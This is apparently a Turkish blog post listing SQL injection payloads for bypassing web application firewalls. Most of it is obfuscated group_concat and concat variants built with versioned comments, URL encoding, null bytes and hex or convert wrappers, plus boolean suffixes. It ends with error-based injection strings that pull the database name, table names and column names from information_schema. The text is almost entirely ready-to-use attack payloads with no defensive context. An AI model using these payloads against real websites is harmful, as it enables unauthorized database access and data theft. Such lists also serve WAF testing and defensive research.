27 Temmuz 2021 Salı

SQL Web Uygulama G.Duvarı GroupConcat Atlatma

 


SQL Web Uygulama G.Duvarı GroupConcat Atlatma 


SQL Web Uygulama Güvenlik Duvarı GroupConcat Bypass Atlatma Örnekleri


SQL Waf Group_Concat Bypass Örnekleri


Group_Concat

   group_concat()

   /*!group_concat*/()

   grOUp_ConCat(/*!*/,0x3e,/*!*/)

   group_concat(,0x3c62723e)

   g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29

   CoNcAt()

   CONCAT(DISTINCT Version())

   concat(,0x3a,)

   concat%00()

   %00CoNcAt()

   /*!50000cOnCat*/(/*!Version()*/)

   /*!50000cOnCat*/

   /**//*!12345cOnCat*/(,0x3a,)

   concat_ws()

   concat(0x3a,,0x3c62723e)

   /*!concat_ws(0x3a,)*/

   concat_ws(0x3a3a3a,version()

   CONCAT_WS(CHAR(32,58,32),version(),)

[~] group_concat() [~]

/*!group_concat*/()

gRoUp_cOnCAt()

group_concat(/*!*/)

group_concat(/*!12345table_name*/)

group_concat(/*!50000table_name*/)

/*!group_concat*/(/*!12345table_name*/)

/*!group_concat*/(/*!50000table_name*/)

/*!12345group_concat*/(/*!12345table_name*/)

/*!50000group_concat*/(/*!50000table_name*/)

/*!GrOuP_ConCaT*/()

/*!12345GroUP_ConCat*/()

/*!50000gRouP_cOnCaT*/()

/*!50000Gr%6fuP_c%6fnCAT*/()

unhex(hex(group_concat(table_name)))

unhex(hex(/*!group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(table_name)))

unhex(hex(/*!12345group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))

unhex(hex(/*!50000group_concat*/(table_name)))

unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))

convert(group_concat(table_name)+using+ascii)

convert(group_concat(/*!table_name*/)+using+ascii)

convert(group_concat(/*!12345table_name*/)+using+ascii)

convert(group_concat(/*!50000table_name*/)+using+ascii)

CONVERT(group_concat(table_name)+USING+latin1)

CONVERT(group_concat(table_name)+USING+latin2)

CONVERT(group_concat(table_name)+USING+latin3)

CONVERT(group_concat(table_name)+USING+latin4)

CONVERT(group_concat(table_name)+USING+latin5)

Group_Concat

group_concat ()

/*!group_concat*/ ()

grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )

group_concat (, 0x3c62723e )

g % 72oup_c % 6Fncat % 28 % 76% 65rsion

% 28 %29 ,% 22 ~ BlackRose% 22 %29

CoNcAt ()

CONCAT (DISTINCT Version ())

concat (, 0x3a ,)

concat %00 ()

% 00CoNcAt ()

/*!50000cOnCat*/ ( /*!Version()*/ )

/*!50000cOnCat*/

/**//*!12345cOnCat*/ (, 0x3a ,)

concat_ws ()

concat (0x3a ,, 0x3c62723e )

/*!concat_ws(0x3a,)*/

concat_ws ( 0x3a3a3a , version()

CONCAT_WS ( CHAR ( 32, 58, 32 ), version

(),)

REVERSE( tacnoc )

binary (version ())

uncompress (compress ( version()))

aes_decrypt ( aes_encrypt ( version

(), 1), 1 )[/ b ][/ u ][/ size ]


[~] after id no. like id=1 +/*!and*/+1=0 [~]

+div+0

Having+1=0

+AND+1=0

+/*!and*/+1=0

and(1)=(0)


---


HATA KAYNAKLI GROUP CONCAT ATLATMA

=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–

--

VERİTABANI GROUP CONCAT ATLATMA

21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--

TABLO İSİMLERİ GROUP CONCAT ATLATMA

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--

KOLON SAYILARI GROUP CONCAT ATLATMA

21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
